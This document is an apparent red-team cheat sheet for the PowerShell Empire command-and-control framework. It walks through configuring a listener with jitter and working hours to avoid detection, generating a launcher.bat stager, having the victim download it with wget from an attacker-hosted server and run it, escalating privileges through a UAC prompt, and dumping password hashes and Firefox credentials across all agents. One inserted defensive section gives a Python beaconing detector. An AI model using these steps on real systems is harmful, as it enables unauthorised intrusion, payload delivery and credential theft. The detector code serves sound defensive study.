# PowerShell Empire

## Modules:

* PowerBreach: Persistence
* Posh-SecMod: Discovery
* PowerSploit: CodeEx, Keylog, etc.
* PowerUp: privesc
* PowerView: Enum, includes "Find Interesting Files"

### Module Categories:

* CodeEx
* Coll
* Exfil
* Expl
* Fun
* Lateral

### More Module Categories:

* Management: email/runas/hash
* Persistence: tasksched/reg/script
* Recon: Enum
* SitAwareness: scan/netstat
* Trollsploit: RickRoll fun

## Getting Started

```
Linux:
cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history

Normal:
sudo ./empire

agents = sessions
info = show options
listeners = multihandler
```

## Module

```
searchmodule privesc
listeners
?  ..help for listeners
```

## Listener

```
uselistener  ..<tab-complete>
uselistener http
info

DefaultJitter  ..randomises check-in timing (harder to spot)
KillDate       ..agent quits on this date
WorkingHours   ..agent goes silent outside these hours
SlackChannel   ..notifs in Slack

set DefaultDelay 1   ..shorter delay, commands return faster
set Host http://10.x.x.x:8080
set Port 8080   ..quirky, but setting both Host and Port helps
info
?   ..help
execute
listener successfully started (like: multihandler)

listeners  ..view current listeners
.. note: the listener could be renamed from 'http'
```
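DefaultDelay and DefaultJitter above set the agent's check-in cadence; jitter spreads the gaps, but only within a band around the delay, so the cadence stays far more regular than human browsing. Added defender-side example, not from these notes or the Empire project: a Python check that flags near-periodic check-ins in constructed proxy log lines (the log format, hosts and URIs are all assumed).

```python
# Added defender-side example, not from the original notes or the Empire project:
# flag near-periodic check-ins in a constructed proxy log whose lines read
# "<epoch_seconds> <src_ip> <dst_host:port> <uri>".
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 checks in about every 5 s (a 5 s delay with
# roughly 20% jitter); 10.0.0.7 is ordinary irregular browsing.
SAMPLE_LOG = """\
1700000000 10.0.0.5 10.0.0.9:8080 /api/status
1700000005 10.0.0.5 10.0.0.9:8080 /api/status
1700000009 10.0.0.5 10.0.0.9:8080 /api/status
1700000015 10.0.0.5 10.0.0.9:8080 /api/status
1700000020 10.0.0.5 10.0.0.9:8080 /api/status
1700000024 10.0.0.5 10.0.0.9:8080 /api/status
1700000030 10.0.0.5 10.0.0.9:8080 /api/status
1700000000 10.0.0.7 10.0.0.9:8080 /index.html
1700000001 10.0.0.7 10.0.0.9:8080 /style.css
1700000030 10.0.0.7 10.0.0.9:8080 /about.html
1700000032 10.0.0.7 10.0.0.9:8080 /img/logo.png
1700000033 10.0.0.7 10.0.0.9:8080 /contact.html
"""

def parse_log(text):
    """Yield (timestamp, src, dst) per well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit():
            yield int(parts[0]), parts[1], parts[2]

def gaps_by_pair(records):
    """Map each (src, dst) pair to its inter-request gaps in seconds."""
    stamps = defaultdict(list)
    for ts, src, dst in sorted(records):   # sorted by time, then src
        stamps[(src, dst)].append(ts)
    return {pair: [b - a for a, b in zip(t, t[1:])]
            for pair, t in stamps.items()}

def find_beacons(text, max_cv=0.3, min_gaps=4):
    """Return {(src, dst): (mean_gap, cv)} for pairs with a steady cadence."""
    hits = {}
    for pair, gaps in gaps_by_pair(parse_log(text)).items():
        if len(gaps) < min_gaps or mean(gaps) <= 0:
            continue
        # cv = stdev / mean: jitter widens it a little, browsing a lot
        cv = pstdev(gaps) / mean(gaps)
        if cv <= max_cv:
            hits[pair] = (round(mean(gaps), 2), round(cv, 3))
    return hits
```

Tune max_cv and min_gaps to the listener's jitter and the log window; a very large jitter needs a looser threshold and more samples before the cadence stands out.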

## Stager

```
back
usestager  ..<tab-complete>

.. windows/hta   ..good to get past email filters
.. windows/macro ..good to use in Word

usestager windows/launcher_bat
info
set Listener http  ..choose our current
generate           ..created /tmp/launcher.bat

---------------------------------------------------------------
Share with Python:
python3 -m http.server

---------------------------------------------------------------
Windows/Target
Download with Windows PowerShell:

PS> cd .\Desktop\
PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
Desktop > double-click launcher.bat
```

## Connected

```
Linux: Empire now shows connected!!

agents
interact ABC123SESS
rename Agent1
info  ..hostname, user, process, etc

list listeners
list agents
```

## Doing more

```
usemodule <tab>
usemodule situational_awareness/host/winenum
.. also cool: collection/FoxDump  ..Firefox credential dump

searchmodule powerup
usemodule privesc/powerup/allchecks

.. found unquoted service paths
.. exe has weak permissions
.. expect some false positives
```

## Elevated Modules

```
back
usemodule powershell/credentials/powerdump*
* means the module needs elevated privileges

info
run   ..error: must run from an elevated agent
```

## PrivEsc Modules

```
back
usemodule privesc/ask  ..will prompt user to accept
.. unless UAC is configured to allow everything without prompting

set Listener http
run

agents
.. the new agent is marked * (higher privilege)
rename 8VDM9S2G AgentHIGH
```

## Powerdump

```
interact AgentHIGH
usemodule credentials/powerdump*
.. dumps password hashes!!

back
shell ipconfig
shell whoami
```

## Portscan

```
searchmodule portscan
usemodule situational_awareness/network/portscan
info
set Hosts 10.x.x.x
run
```

## All Agents - Powerful

```
usemodule powershell/credentials/powerdump
info
set Agent all   ..to run on ALL agents
execute
```

## Cleanup

```
agents
kill all
listeners
kill http
exit

cd /opt/empire/downloads/
cd AgentHIGH
less agent.log  ..log of every command and its output!!!!

cd /opt/empire/setup
sudo ./reset.sh   ..cleanup previous history
```
